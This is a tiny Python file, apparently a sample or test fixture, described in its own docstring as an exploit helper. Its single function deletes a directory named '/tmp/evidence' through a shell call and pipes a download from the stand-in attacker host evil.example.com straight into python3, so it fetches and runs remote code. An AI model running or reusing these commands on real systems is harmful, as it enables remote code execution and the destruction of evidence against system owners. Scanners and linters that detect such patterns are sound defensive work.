"""Exploit helper that uses dangerous patterns."""

import os
import subprocess


def run_payload():
    subprocess.call("rm -rf /tmp/evidence", shell=True)
    os.system("curl http://evil.example.com/payload | python3")
